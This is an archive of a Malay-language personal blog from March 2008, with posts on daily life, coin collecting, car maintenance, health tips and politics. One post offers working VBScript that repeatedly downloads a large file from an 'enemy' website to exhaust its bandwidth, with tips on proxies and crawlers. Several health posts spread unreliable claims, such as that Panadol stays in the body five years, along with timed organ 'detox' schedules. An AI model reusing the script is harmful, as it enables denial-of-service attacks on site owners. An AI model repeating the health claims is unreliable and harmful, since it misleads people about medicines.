Monday, March 31, 2008

Literature review dan Rancangan hidup jangka masa pendek

Otak aku pening.. aduh.. ia bagaikan membuat tesis
hari ini hari ulangtahun perkenalan aku dan si'Dia'
dan banyak list yang aku nak letak hahaha
suma list ada di bawah

1.Siapkan kerja
2.Membeli coklat.. uhuhuhu
3.Tebus voucher jusco
4.Basuh moto
5.Kumpul modal beli DSLR D40x atau D60
6.Berdoa supaya dimurahkan rezeki
Read More

TriBulus untuk lelaki?

kata kak sue.. 'minuman ni sesuai untuk lelaki'
kata seorang gadis 'minuman ini sesuai untuk lelaki.. kak sue yang bagitau saya'
Tribulus..
Read More

Tissue Magic? Magic Tissue? Tisu Ajaib?

mungkin ada gunanya.. belajarlah dari yang berpengalaman..
maksud aku.. orang-orang lama..
Read More

Ayat rahsia lelaki kuat.. ubat hijau

kalau kamu mahu 'maintain' dan mahu menjadi seorang lelaki gagah..
saya syorkan 'ubat hijau' ini.. 1 kapsul RM 10..
amacam.. ada berani?
cara order.. 'epimedi satu atau ubat hijau satu'
Read More

Sunday, March 30, 2008

Bunga? ini Bunga apa?

Hari Ahad adalah hari aku menunggu hasil side income aku..
adakah hari ini lebih baik dari hari semalam?

semak samun di halaman rumah sewa..
dan terselit bunga.. uh.. ini bunga ke?

Read More

Aktiviti Hari Ahad/ My Gloomy Sunday Activity

kawasan aku ber'blog'..
kehidupan ini bosan tanpa kucing kesayangan..
Read More

Bosan? Ahad ini sungguh bosan..

Selamat tidur tengahari semua..
tolong kejut aku pukul 5
Read More

Dr Mohamad Khir Toyo sudah ada blog lah...

Read More

Saturday, March 29, 2008

Bunga Bawang dan Eksperimen Pertanian

Kamu pernah tengok bunga bawang?
bawang yang bertunas dah tengok?
pernah makan bawang?
bawang merah?
gambar dibawah ini adalah bunga bawang..
tak percaya? kamu tanam bawang sendiri..
pastikan anda faham akan sifat 'sederhana'
tidak banyak dan tidak kurang.. bagaimana nak tanam bawang? hanya buat tapak dia sahaja..
tidak dalam sangat dan tidak terbenam atas sangat..
sederhana.. ingat itu sederhana
Kamu pasti berpuas hati.. confirm puas apabila ia menjadi..
ingat.. jangan banyak sangat air.. jangan sedikit sangat..
sederhana.. iya.. semua kena sederhana...
Read More

Official Shirt for Teratak 42 bloggers

'yang.. ni ada baju baru :)' kata si lelaki sambil menanggalkan jaket K-Swissnya
'tak buatkan untuk orang pun...' balas si gadis..
'cantik x?' kata si lelaki..
'cantik..eh... apa dia tulis nih.. Rumah yang Tenang jangan di sangka tiada Buaya!!!!'
balas si gadis
'sapa yang buat baju ni? cuba cakap sikit? sapa bos buaya kat situ?' kata si gadis agak marah dengan moto ituh
'erk.. erk... erk...ada tulis buaya eh.. macam mana bisnes hari ini' lelaki itu terkedu dan memikirkan jalan mengubah topik...
Read More

Friday, March 28, 2008

Cara Pujuk Teman Wanita../ cara pujuk perempuan

Bayangkan.. ini adalah perang dingin..
dimana perang dingin berlaku..
pelbagai propaganda dilemparkan...
dan masing-masing menegakkan keegoan..

1. Bawaklah gadis anda ke funfair.. awas.. jangan pergi ke kedai tikam
ataupun permainan yang mustahil menang.. ini akan membuatkan hubungan anda
terkandas lagi.. bawa gadis ke tempat yang mempunyai patung/apa-apa yang comel..
perempuan meminati kecomelan.. pastikan tempat itu tiada binatang seperti anjing

2. Bawak pergi makan.. dan ikuti kemahuan si dia.. pastikan 'tangkal pemikat' di dalam
dompet anda bernilai RM 100 ke atas.. itu untuk 'emergency case'.. order mengikut
kehendak si teman wanita awak..
jangan order air.. itu tips dia.. makan yang pedas dan jangan order air bagi si lelaki..
nanti si dia pasti akan terharu melihat awak makan.. makan cili sekali...
dan makan cili sambil berbual.. atau termenung sambil membiarkan air mata lelaki tak tahan pedas itu mengalir.. posing skit.. kasi tahap model ataupun bintang filem..

3. singgah ke seven eleven.. dan sesi perjanjian damai...

lafazkan ayat ini
'janji... kita tidak akan terpisah buat selama-lamanya kecuali ajal menjemput'
serta
'janji.. jangan ada orang ketiga yang berada di dalam hubungan kita..'
Read More

Thursday, March 27, 2008

Mimpi duit syiling..

aku tidak tahu.. tapi.. malam tadi aku mimpi
berbual dengan orang yang tidak dikenali
lepak lepak cerita pasal hobi..
dia ada duit syiling segi lapan..
dia bagi aku pegang..
banyak betul syiling lama..
jeles gak..
Read More

Wednesday, March 26, 2008

Saman fitnah: Penulis blog Raja Petra dan tiga defendan diperintah bayar RM7 juta kepada Naib Canselor UUM

aduhai.. RM 7 Juta tu.. kalo income sehari USD 40k takdak hal rasanya...
hua... kena saman dah blogger.. baru je tadi kuar TV3..

ALOR STAR 26 Mac – Penulis blog Raja Petra Kamaruddin, Parti Keadilan Rakyat (PKR) dan Ketua Pengarang akhbar Suara Keadilan diperintah membayar ganti rugi RM7 juta kepada Naib Canselor Universiti Utara Malaysia (UUM), Tan Sri Nordin Kardi dan UUM dalam satu kes saman fitnah.

Timbalan Pendaftar Mahkamah Tinggi Alor Star, Priscilla Gengadaran hari ini membuat taksiran ganti rugi sebanyak RM7 juta yang patut dibayar kepada Nordin Kardi dan UUM selepas defendan menyiarkan fitnah terhadap mereka dalam laman web dan akhbar Suara Keadilan.

Nordin Kardi dan UUM menyaman empat defendan dalam kes tersebut.

Defendan pertama ialah Raja Petra, defendan kedua parti PKR, diikuti Ketua Pengarang akhbar Suara Keadilan dan editornya.

Mahkamah memutuskan Raja Petra memfitnah Nordin dan UUM apabila mendakwa dalam laman web www.malaysia-today.net pada 16 Disember 2006 secara penulisan menyiarkan sebuah artikel bertajuk Dato Dr. Nordin Kardi Ciplak Karya Saya? Mohon Penjelasan.

Nordin Kardi mendakwa beliau telah difitnah selama tempoh dua minggu penerbitan artikel berkenaan dan fitnah tersebut adalah melibatkan profesion dan integriti beliau untuk mengetuai sebuah universiti awam.

Sementara defendan kedua, ketiga dan keempat pula didakwa menyiarkan sebuah artikel bertajuk NC UUM Penciplak dalam akhbar Suara Keadilan bilangan 098 bertarikh 27 Disember 2006 hingga 10 Januari 2007 di muka surat 26 akhbar defendan kedua. - Utusan

Read More

Tuesday, March 25, 2008

DDoS vbscript code..

Cara menghabiskan bandwidth musuh kita di alam siber
pertama.. kaji.. kita kena pastikan yang si musuh kita ni ada website
dan mempunyai limited bandwidth
cth.. bandwidth setiap bulan adalah 10gb
kita habiskan 10gb dalam masa 1 hari..
mustahil ke?

owh.. bergantunglah pada server dia..
dan kawan-kawan anda
mana tahu musuh korang itu kaya raya.. stok unlimited bandwidth
adakah kamu mahu lihat paparan
'Bandwidth exceed limit?' ya...
tuan puan..

ok.. cuba kita senaraikan fail yang si musuh kita ada
cth.. http://aaaaa.com/setup.exe < fail ini besarnya 12Mb
senaraikan dahulu...
index.html < katakan yang ini 180kb
cari fail yang besar.. movie ni stok 700MB ..
but download loop sebanyak 15 kali sudah

kalo nak keji.. cari website crawler.. dan ambil semua fail yang ada di server musuh anda..

okeh..
anda paham ke?
mungkin ilmu ini sesuai untuk yang ahlinya sahaja
dengan menggunakan proxy-swicther
atau proxy manual..

code inih... save sebagai habiskanbandwidth.vbs
er.. pastikan saiz hardisk anda pun besar jugala ye..
===========================&< Cut here========================
for a = 1 to 999999
HTTPDownload "http://musuhanda.com/failmusuhanda", "C:\"
next

Sub HTTPDownload( myURL, myPath )
Dim i, objFile, objFSO, objHTTP, strFile, strMsg
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Set objFSO = CreateObject( "Scripting.FileSystemObject" )
If objFSO.FolderExists( myPath ) Then
strFile = objFSO.BuildPath( myPath, Mid( myURL, InStrRev( myURL, "/" ) + 1 ) )
ElseIf objFSO.FolderExists( Left( myPath, InStrRev( myPath, "\" ) - 1 ) ) Then
strFile = myPath
Else
WScript.Echo "ERROR: Target folder not found."
Exit Sub
End If
Set objFile = objFSO.OpenTextFile( strFile, ForWriting, True )
Set objHTTP = CreateObject( "WinHttp.WinHttpRequest.5.1" )
objHTTP.Open "GET", myURL, False
objHTTP.Send
For i = 1 To LenB( objHTTP.ResponseBody )
objFile.Write Chr( AscB( MidB( objHTTP.ResponseBody, i, 1 ) ) )
Next
objFile.Close( )
End Sub
======================End Cut==================================

kode ini tak sesuai untuk server yang unlimited bandwidth
Read More

Gambar Menteri Besar Malaysia 2008

damn.. coding suma berterabur..
iye incik.. mahu tengok gambar menteri besar.. sila pergi ke sini
More>>>
Read More

My blog is down..

Damnnn.. rupanya line internet yang free aku
tu yang masalah.. ...
Read More

Monday, March 24, 2008

Pandangan terhadap Idris dari blogger sekampung dengannya

politik.. oh politik...

dipetik dari blog tz(seorang blogger sekampung dengan Idris)

'perlantikan MB terengganu masih belum nampak kata putusnya.. istana dan bn terus dingin.. rakyat terus tertanya².. aku tidak pasti ape pengakhiran drama politik ini..tidak bisa menganalisis..

apa yang pasti.. perlantikan dan pengekalan sideris ada matlamatnya... ade udang di sebalik batu.. itu yang pasti.. PL bapak dan juga PL anak.. sudah terang lagi bersuluh..mane kepatuhan kepada rukun negara.. bila DAP buat hal.. pandai pula berkata... jika terkena pada diri sendiri.. laen pula ceritanya..

kisah PL bapak and PL anak sewenang² menghabiskan duit royalti terengganu sudah kedengaran sane sini.. perlantikan deris sudah pasti memberi laluan kepada PL anak untuk menjaga kewangan terengganu.. aku yakin.. pihak istana sudah tahu apa yang berlaku dalam pentadbiran terengganu..'

Read More

Koleksi wang kertas/duit kertas lama dan baru

'dik.. nak tak duit 0122122.. tuka ngan abah' aduh.. terharu aku
mungkin pacik ni tersasul...
tiba-tiba teringatkan kampung halaman lagi..
tadi baru aje lepas baca blog azharahmad..

betul kata orang.. bila dah tua..
kita akan teringat kat anak..
bila kita muda.. mak bapak kita lupakan
kononnya sibuk hal kerja..

kena cari tiket balik nampaknya aku..
klik gambar untuk besar..
Read More

Cara mengelak dari dijangkiti Virus atau Worm

ni tips dia.. untuk elak dari serangan virus
bagaimana nak elak virus? macammana nak bersihkan virus

ada virus yang modified *exe menjadi host dia.. dan ini menyebabkan
suma fail bervirus yang di'execute'
itu sebab mengapa sesetengah orang akan berkata
'saya dah bersihkan virus.. tapi virus tu tetap ada.'
maknanya ada virus dah jadi sebahagian dari sistem pengoperasian..

untuk mengelak dari diserang virus yang begitu

kita kena disable virus dari modified suma exe file kita..
in command prompt
taip

cd\
cacls *.exe /t /c /p everyone:r

kalau worm plak.. dia lain.. kerja worm ni dia buat salinan diri sahaja..
dia salin diri ke pendrive, salin diri ke hard disk
atau salin diri ke network..
ada satu file yang bleh trigger worm.. iaitu autorun.inf..
atau user sendiri klik pada fail itu..

cara disable auto run

1. kalau guna XP Pro, ikut langkah 1 hingga 8.sesiapa yang guna XP Home mula langkah 9
2. klik Start pastu klik Run
3. taip gpedit.msc dan klik OK
4. satu group policies akan tebuka dan klik dua kali Administrative Templates
5. kat belah kanan.. klik System
6. scroll down dan cari Turn Off Autoplay
7. kat tetingkap Turn Off Autoplay Properties, pilih Enabled. next dan setkan Turn Off Autoplay on, pilih All drives pastu klik OK
8. pastu exit Group Policy dengan tekan menu File, pilih Exit dari menu
9. XP Home pulak.. kena style lain,klik Start pastu klik Run
10. taip regedit dan klik OK.
11. pada bahagian kiri.. sila cari
HKEY_CURRENT_USER
Software
Microsoft
Windows
CurrentVersion
Policies
Explorer.

12. pastikan Explorer dihighlight, pastu pilih value pada bahagian kanan dan pilih NoDriveTypeAutoRun right klik dan Modify .kena set dalam hexadecimal
13. taip b5 dan klik OK. (disable auto run untuk removable dan cdrom)
14. pastu exit. dan reboot

jika arahan itu terlalu komplek..
saya syorkan download tools.. dari microsof Download DownloadTweakUI.exe
install dan bleh edit registery tanpa manual..
memudahkan pengguna untuk edit registery

kebanyakan mereka menyamar dengan ikon yang mengelirukan pengguna
diorang(penulis virus) akan extract ikon menggunakan reshack dan
compile worm dengan ikon resourse itu sekali..
itu sebab banyak yang terklik

nak elakkan.. kena view extension for known file type..
cara elak

bukak my computer - > pergi ke tools - > folder options
klik pada tab view.. mark/check pada show hidden file and folder
dan unmark/uncheck pada Hide extension for known file type
kadangkala worm itu beratributkan fail sistem..
jadi untuk pencegahan..
sila unmark/uncheck hide protected operating system file

mencegah itu lebih baik dari mengubati
tapi kalo dah kena.. kita kena ubat lah..
itu pesanan untuk yang belum kena aje..
Read More

Sunday, March 23, 2008

Another boring Sunday

akhirnya aku tergerak nak lepak kat bilik sendiri..
bleh buat sesuka hati aku yeah....
main pinball.. macam sial..
ni guna cheat nih..
bukak pinball pastu taip 'hidden test' tanpa quote
dan gerakkan mouse anda..
jgn tekan space bar ok :D
selamat mebazir masa..
Read More

Duit syiling malaysia Dua puluh sen 1967/1967 malaysia coins 20 cent

klik gambar untuk besar
gambar dibawah adalah duit syilling yang dicipta pada tahun 1967
Read More

Duit Syiling 10 sen tahun 1967/ 10 cent Malaysia coins 1967

Klik gambar untuk besar
gambar dibawah adalah duit syilling yang dicipta pada tahun 1967
Read More

Info kepada pemilik kereta : Part 2

(Bahagian 2)

2. SERVIS KERETA
Kpd orang pompuan, anda sebenarnya boleh menjimatkan duit anda masa servis kereta..
basic servis kereta adalah


i) penukaran minyak enjin + tukar penapis minyak
ii) cuci atau tukar penapis angin (air filter ; biasanya benda ni tahan lama.. 6 7 8 kali servis baru tukar sekali air filter ni)

iii) iii) periksa & top up air bateri (kalau nak tukar bateri yg baru ambil jenis jenis

Century ; bateri kereta Century air bateri lambat surut & bateri ni tahan lama)

Kos basic servis di workshop
Minyak enjin (20-50W) RM50 - 60 ++
Oil filter RM10-RM13
Top up battery water (biasanya free atau termasuk dlm labour charge)
Labour charge RM15 - RM 25

Kalau suruh kawan2 anda yg lelaki buat sendiri
(contoh kos servis sendiri utk kereta P. Wira)
Anda pergi beli sendiri benda2 ni kat kedai spare part
Minyak enjin (Castrol 20-50W) RM28 (Harga Jun 2006)
Penapis minyak/Oil filter jika jenis proton standard baru RM8 satu..
Andaikan air filter tak yah tukar (elok lagi)
Top up air bateri (air bateri RM1 - RM2 sebotol) boleh top up pakai balance air bateri kawan anda yg lelaki tu (free je) J

Labour charge - Belanja la kawan2 lelaki anda yg tolong servis kereta anda tu..

P/S : Bandingkan kos anda.. (sebab tu la orang pompuan kena berbaik2 dgn orang lelaki nie.. jangan dok jual mahal je) J


3. TIMING BELT
Adalah mustahak timing belt ditukar setiap60,000km (jenis proton standard, original protonparts) .. kalau anda pakai jenis Mitsubishi boleh tahan sampai 100,000km (hati-hati, kat kedaisparepart ada jual timing belt jenisMitsuboshi (brand tiruan @ cap ayam).. sekiranya timing belt enjin kereta anda kena air.. kena minyak enjin dgn banyak yg meresap melalui celah enjin (gasket enjin dah bocor), maka disarankan anda terus tukar timing belt kerana ketahanan getah tali ‘timing belt’ ini sudah berkurangan (tear & wear)..

Catatkan bacaan odometer reading di dashboard kereta anda supaya anda tahu bilakah perlu dilakukan pertukaran timing belt seterusnya. Contohnya sekiranya ‘clock’ odometer reading kereta anda mencatat kereta anda telah berjalan sejauh 165,433km maka pertukaran timing belt seterusnya perlu dilakukan apabila bacaan odometer kereta anda mencecah 225,433km.

Kegagalan untuk menukar timing belt pada masa yg disyorkan oleh mekanik boleh menyebabkan ianya putus di tengah jalan (apa lagi piston akan jammed, rod akan bengkok atau patah, blok enjin akan calar atau pecah...) duit anda akan terbang ratus2.. kena overhaul la jawabnya.. (kos baik pulih enjin kancil jika timing belt putus RM600++, Opel frontera RM2000 ++ (kos tukar timing belt Opel frontera ni baru RM400..)

P/S : Kos servis kereta di workshop sudah naik skrg ni. Harga minyak enjin di kedai sparepart juga sudah naik skrg ni. Berhati-hati membeli atau menyerbis kereta kesayangan anda… skrg ni ada kedai sparepart dan workshop membuat onar dgn menjual / menggunakan minyak enjin terpakai.. akibatnya enjin kereta anda akan kaput dlm tempuh 2 minggu.
More>>>

Read More

Info kepada pemilik kereta : Part 1

Credit: kimmy_ky / ehoza.com

sebelum anda membeli kereta..
anda harus tahu tentang kejadian yang bakal anda hadapi..
disini saya letak info untuk anda..

INFO UNTUK PEMILIK KERETA (BAHAGIAN PERTAMA)
TERUTAMANYA UNTUK ORANG POMPUAN RAMAI YANG TIDAK TAHU RUPANYA… BACALAH…

(Bahagian 1)

1. PASAL ‘TARIK’ KERETA


Sebenarkan pihak bank sendiri yang memberikan data-data (butir-butir pemilik kereta yg gagal jelaskan‘installment’ bulanan kereta) kepada 'geng' tarik kereta ni..

hanya dari dlm kereta dgn membawa laptop, mereka dpt 'trace' everything mana-mana kereta dgn hanya menaip no pendaftaran kereta.. seluruh Malaysia ..

menurut kawan saya yg buatpart time jual kereta 2nd hand ni, sepatutnya bilainstallment kereta dah tertunggak 3 bulan 2 minggu baru lah bank boleh keluarkan surat tarik kereta tu.. kalau dah tertunggak 2 bulan lebih biasanya bank akancall atau hubungi kita..

bila kereta dah kena tarik, ada tempoh 21 hari (3 minggu) sebelum kereta tersebut dijual secarapublic auction (lelongan awam). Boleh ambil balik kereta yg kena tarik tu dgn membayar kpd bank 2 atau 3 bulaninstallment yg tertunggak tu +‘interest’ (bank akan kenakan faedah harian terhadap‘installment’ kereta jika lewat membayar ; bank bumi 8% sehari) + duit upah tarik (biasanya RM500 - RM700) dan duit upah simpan kereta kat stor (RM10 - RM15) sehari..

kalau installment bulanan kereta anda tertunggak 3 bulan ++.. tiba-tiba anda terjumpa dgn ‘geng’ tarik kereta di jalanan, janganpanic.. pada peringkat ini anda sebenarnya masih boleh berunding dgn ‘geng’ tarik kereta ni.. tindakan anda..

i) minta dari mereka surat akuan dari bank yg menyatakan kereta anda telah tertunggak 3 bulan ++..
ii) biasanya mereka akan meminta anda mengikut mereka ke bank utk membayar 2 bulan duit installment kereta yg tertunggak & sedikit duit kopi utk mereka (biasanya RM250 - RM400)..
iii) sila telefon, minta la bantuan kecemasan 999 kat sapa2.. pinjam dulu duit kat mak cik pak cik @ sedara mara atau kawan2office anda (jangan lupa bayar balik ; jangan malu utk bagitau keadaan anda sebenar..) Insyaallah kereta tu masih boleh diselamatkan. .
Read More

The main causes of liver damage

sebab musabab hati rosak atau kerosakan hati

1. Sleeping too late and waking up too late are main cause.
2. Not urinating in the morning.
3. Too much eating.
4. Skipping breakfast.
5. Consuming too much medication.
6. Consuming too much preservatives, additives, food coloring , and
artificial sweetener.
7. Consuming unhealthy cooking oil. As much as possible reduce
cooking oil use when frying, which includes even the best cooking
oils like olive oil.
Do not consume fried foods when you are tired, except if the body is
very fit.
8. Consuming raw (overly done)
Foods also add to the burden of liver.
Veggies should be eaten raw or cooked 3-5 parts. Fried veggies
should be finished in one sitting, do not store.

We should prevent this without necessarily spending more. We just
have to adopt a good daily lifestyle and eating habits. Maintaining
good eating habits and time condition are very important for our
bodies to absorb and get rid of unnecessary
chemicals according to "schedule."

Because :

Evening at 9 - 11 PM :
is the time for eliminating unnecessary toxic chemicals (detoxification) from the antibody system (lymph nodes). This time duration should be spent by relaxing or listening to music. If during this time a housewife is still in an unrelaxed state such as washing the dishes or monitoring children doing their
homework, this will have a negative impact on health.

Evening at 11pm - 1 am :
is the detoxification process in the liver, and ideally should be done in a deep sleep state.

Early morning 1 - 3 am :
detoxification process in the gall, also ideally done in a deep sleep state.

Early morning 3 - 5 am :
detoxification in the lungs. Therefore there will sometimes be a severe cough for cough sufferers during this time. Since the detoxification process had reached the respiratory tract, there is no need to take cough medicine so as not to interfere with toxin removal process.

Morning 5 - 7am :
detoxification in the colon, you should empty your bowel.

Morning 7 - 9 am :
absorption of nutrients in the small intestine,you should be having breakfast at this time. Breakfast should be earlier, before 6:30 am , for those who are
sick. Breakfast before 7:30 am is very beneficial to those wanting to stay fit. Those who always skip breakfast, they should change their habits, and it is still better to eat breakfast late until 9 - 10 am rather than no meal at all.

Sleeping so late and waking up too late will disrupt the process of removing unnecessary chemicals. Aside from that, midnight to 4:00 am is the time when the bone marrow produces blood. Therefore, have a good sleep and don't sleep late.
Read More

Brain Damaging Habits

1. No Breakfast
People who do not take breakfast are going to have a lower blood
sugar level.
This leads to an insufficient supply of nutrients to the brain
causing brain degeneration.

2. Overeating
It causes hardening of the brain arteries, leading to a decrease in
mental power.

3. Smoking
It causes multiple brain shrinkage and may lead to Alzheimer
disease.

4. High Sugar consumption
Too much sugar will interrupt the absorption of proteins and
nutrients causing
malnutrition and may interfere with brain development.

5. Air Pollution
The brain is the largest oxygen consumer in our body. Inhaling
polluted air decreases the supply of oxygen to the brain, bringing about a
decrease in brain efficiency.

6. Sleep Deprivation
Sleep allows our brain to rest. Long term deprivation from sleep
will accelerate the death of brain cells.

7. Head covered while sleeping
Sleeping with the head covered, increases the concentration of
carbon dioxide and decrease concentration of oxygen that may lead to brain damaging effects.

8. Working your brain during illness
Working hard or studying with sickness may lead to a decrease in
effectiveness of
the brain as well as damage the brain.

9. Lacking in stimulating thoughts
Thinking is the best way to train our brain, lacking in brain
stimulation thoughts may cause brain shrinkage.

10. Talking Rarely
Intellectual conversations will promote the efficiency of the brain.
Read More

Panadol bahaya pada hati?

aku surfing forum.. dan jumpa satu artikel..
ni untuk korang merujuk atau buat kajian..

JANGAN AMBIL PANADOL & PANADOL ACTIFAST / SOLUBLE LAGI (TERUTAMA MEREKA YANG ADA GASTRIK)

UNTUK PENGETAHUAN, ikuti sebuah kenyataan benar dari seorang yang mengalaminya...


"Suami saya bekerja sebagai Jurutera IT di sebuah hospital, di mana pihak hospital sedang menyiapkan pengkalan data untuk pesakitnya. Dia mengenali rapat doktor tersebut. Doktor memberitahu suami saya, apabila mengalami sakit kepala, mereka sendiri tidak sanggup mengambil Panadol atau Paracetamol. Sebaliknya, mereka akan mencari ubatan herba Cina atau mencari altenatif lain.

Ini kerana Panadol adalah bertoksik kepada tubuh kita. Ia merosakkan organ hati. Menurut doktor tersebut, Panadol akan tinggal di dalam tubuh selama sekurang-kurangnya 5 tahun. Menurutnya lagi, pernah berlaku seorang pramugari menelan terlalu banyak Panadol semasa kedatangan haid kerana tugasnya perlu berdiri sepanjang masa penerbangan. Dia kini baru berumur 30-an tetapi sudah perlu menjalani rawatan buah pinggang (dialisis) setiap bulan.

Seperti kata doktor tersebut, sakit kepala disebabkan ketidak-seimbangan elektron/ion di dalam sel otak. Sebagai rawatan alternatif, beliau mencadangkan membeli sebotol atau 2 botol minuman isotonik, campurkan dengan air minuman pada kadar 1:1 atau 1:2. Mudahnya, secawan isotonik dengan 2 cawan air minuman.

Saya dan suami pernah mencuba kaedah ini dan mendapati ia berkesan. Kaedah lain ialah merendam kaki ke dalam besin yang mengandungi air suam. Ia akan memberi tekanan darah menurun dari kepala anda.

Panadol adalah sejenis "painkiller", semakin banyak anda mengambilnya, semakin lama semakin kurang kesannya kepada anda. Bererti anda perlukan dos yang lebih lagi apabila ia kurang berkesan.

Kita semua akan jatuh sakit apabila usia kita semakin meningkat. Untuk wanita, mereka akan melalui pengalaman melahirkan zuriat. Bayangkan mereka akan diberi dos yang kuat apabila terpaksa melalui proses beranak melalui pembedahan. Jika anda terlalu banyak mengambil Panadol atau Paracetamol sepanjang hidup anda, seperti mereka yang ada migrain, ia akan memberi kesan sifar terhadap kesakitan yang anda alami dan anda memerlukan ubat yang lebih kuat lagi untuk mengurangkan rasa sakit. Adakah anda sanggup diberi dadah yang kuat seperti morfin?

Hargailah kehidupan anda. Fikir sebelum mudah memasukkan ubat yang "biasa" ini ke dalam mulut anda.

Read More

10 Makanan yang Anti-kolesterol

1. SOYA

Kacang soya merupakan makanan popular yg diproses untk mendapatkan Kacang soya mengandungi 48% protein, lesitin, vitamin & zat galian.Ia juga Dpt menghidarkan penyakit jantung & kencing manis. Kaya kalsium & Mineral yg membantu memecah lemak. Ia membantu menyusutkan kadar Lemak jahat (LDL) dan meningkatkan kadar lemak baik (HDL)

2. KUACI

Kuaci mempunyai kandunan zat besi. Pola pemakanan yg rendah dgn zat besi boleh menaikkan kadar kolestrol LDL sekali gus menghadkan kolestrol HDL. Mulakan pengambilan kuaci jenis tawar seperti dari jenis labu atau bunga matahari untuk menambah zat besi serta mengurangkan kolestrol.

3. BUAH KERING

Antar pelbagai jenis buah kering, limau kering adalah yg paling banyak mengandungi flavanoid. Pengambilannya mampu menyingkirkan lebihan lemak LDL sehingga dapat mengurangkan risiko sserangan jantung. Flavanoid juga boleh diperolehi dalam the, brokoli, tomato, bawang serta delima.

4. EPAL

Memakan sebiji epal @ meminum jusnya setiap hari cukup untuk membekalkan khasiat bagi mengurangkan kandungan kolestrol dalam badan. Kanak-kanak yg memakan makanan segera dan kemudian memakan epal @ minum jusnya, sebenarnya menyimbangkan kandungan zat dan mencegah berlaku kemak dlm badan.

5. IKAN TUNA

termasuk sumber asid lemak omega-3 yg popular, selain salmon dan makarel. Omega-3 secara khusus melindungi tubuh daripada peningkatan kadar kolestrol LDL.

6. KACANG TANAH

Kacang tanah yg dipanggang mengandungi lemak sihat dan kaya dengan vitamin E. Ia boleh menghalang radikal bebas agar tidak merosakkan kolesterol LDL dan dapat menghindari tubuh daripada serangan jantung.

7. MANGGA

Vitamin C banyak terdapat dalam mangga. Sumber lain : belimbing, kedodong, betik, rambutan, strawberi dan kiwi. Vitamin C berupaya mencegah kolestrol LDL dlm tubuh.

8. KISMIS

Mengandungi sebatian yg mampu menurunkan kolestrol. Sesiap yg mengamalkan diet dgn 400 kalori kismis setiap hari boleh menurunkan kadar kolestrol dlm darah sebanyak 8%.

9. OAT

Lebih daripada kajian saintifik yg dijalankan telah menunjukkan bahawa pengambilan oat setiap pagi boleh menurunkan kolestrol dalam darah. Serat mudah larut dalam oat boleh mengurankan risiko penyakit jantung sekiranya dijadikan sebahagian diet rendah lemak & kolestrol anda.

10. JAMBU BATU

Ia mampu menurunkan paras kolestrol dalam badan sebanyak 18.8%. Disyorkan mengambilnya setiap hari dalam jumlah mencukupi bagi memastikan khasiatnya bertindak balas kepada tubuh. Jumlah yg disyorkan ialah 400gm sehari, iaitu sebiji setengah selama empat minggu. Bagi mereka yang ingin menurunkan berat badan tanpa melupakan diet seimbang, jambu batu adalah pilihan yg sesuai.
Read More

Kelebihan dan keistimewaan serata khasiat Buah Naga

owh.. ini bukan buah 'red' yang ko banggakan..
ini buah-buahan..sedap dan berkhasiat

Buah naga mempunyai isi seperti buah kiwi. Pada masa ini, buah naga yang isinya berwarna putih lebih mudah didapati di pasaran, tetapi mengikut pakar pemakanan dan perubatan, buah yang isinya berwarna merah mempunyai lebih banyak khasiat.

Secara amnya, pakar sependapat dan mengakui buah naga kaya dengan potasium, ferum, protein, serat, sodium dan kalsium yang baik untuk kesihatan berbanding buah-buahan lain yang diimport.

Kajian juga menunjukkan buah ini boleh mencegah kanser usus, selain mencegah kandungan kolesterol yang tinggi dalam darah dan pada masa sama menurunkan kadar lemak dalam badan. [alaahaiiiii tak yah gie gym mcm nie lee ya ].

Secara keseluruhan, setiap buah naga merah mengandungi protein yang mampu mengurangkan metabolisma badan dan menjaga kesihatan jantung; serat (mengawal kanser usus, kencing manis dan diet); karotin (kesihatan mata, menguatkan otak dan menghalang penyakit); kalsium (menguatkan tulang) dan fosferos (pertumbuhan tisu badan).

Buah naga juga mengandungi zat besi untuk menambah darah; vitamin B1 (mengawal kepanasan badan); vitamin B2 (menambah selera); vitamin B3 (menurunkan kadar kolesterol) dan vitamin C (menambah kelicinan, kehalusan kulit serta mencegah jerawat).

Satu lagi fakta menakjubkan ialah berdasarkan kajian terkini, khasiat buah naga tidak terhad kepada buahnya, tetapi turut wujud pada keseluruhan pokok dan sering dijadikan pencuci mulut yang lazat.

Buahnya boleh dibuat jus, jem, dan wain merah daripada buah ini. Semetara buah yang belum masak boleh dimasak sup dan dicampur dengan daging, ekor atau tulang.[bab nie kena cuba jugak nie .

Begitu jugak dengan bunga buah naga pula boleh digoreng sebagai sayuran, dijadikan ulam dan juga boleh dikeringkan untuk dijadikan teh bunga.[ingat lepas tak yah beli teh lagi ya ]

Bunga pokok ini mempunyai kadar debunga yang tinggi kerana tempoh ia mekar penuh terlalu singkat, sekali gus menyebabkan lebah dan serangga lain tidak sempat mengambil debunganya secara penuh berbanding bunga lain yang mekar berbulan-bulan.Debunga bunga buah naga juga mempunyai khasiat tinggi dan cukup baik untuk kesihatan manusia..

Begitu jugak ngan dahan pokok buah naga juga boleh dijadikan salad, ulam, digoreng dengan sambal belacan dan dimasak sup, yang terbukti berkesan untuk membuang toksik dalam badan dan mencuci perut.[mungkin jugak leh wat kerabu kan kan ]
Read More

cara pakai Cincin bagi muslimin muslimat

Nasihat Nabi Muhammad Saw. kepada Saidina Ali rhu. sesudah bernikah dengan Siti Fatimah iaitu anakanda kesayangan , Nabi Muhammad Saw. berpesan kepada Saidina Ali iaitu kalau memakai cincin pakailah di jari

1] jari manis
2] jari kelingking (anak jari)

dan jangan memakai pada jari
1] jari tengah
2] jari telunjuk

Nabi Muhammad saw. melarang kerana memakai cincin pada jari telunjuk dan jari tengah adalah meniru cara berhias kaum yang dilaknat oleh Allah iaitu kaum yang derhaka di zaman Nabi Lut a.s.

Perhatian : Cara memakai cincin adalah termasuk lelaki atau pun perempuan.

p/s: saudara dan saudari, sila nasihatkan kawan-kawan dan juga saudara- mara ataupun anak-anak tentang kaedah yang betul untuk berhias di dalam syariat Islam, kalau tidak sia-sia saja kita mendapat laknat dari Allah Swt. Nabi saw. memakai cincin dan kalau kita memakai cincin dengan niat mengikut sunnah Nabi saw. senang je kita dapat kita pahala.

panduan ini dari orang ke forum ke blog
Read More

Sejarah April Fool

APRIL FOOL, BUAT RENUNGAN & PEDOMAN KITA SEMUA !!!*



Assalamualaikumwbh. Ikutilah cerita sedih di sebalik April Fool's Day
sebagai renungan bersama. Setiap kali menjelang 1hb April, seseten! gah
orang kita begitu taksub dengan budaya 'pandang kebarat'.

Berbalik kepada perayaan April Fool's Day ini, adalah ia mula dirayakan
sewaktu kejatuhan kerajaan Islam di Sepanyol. Setelah bertapak
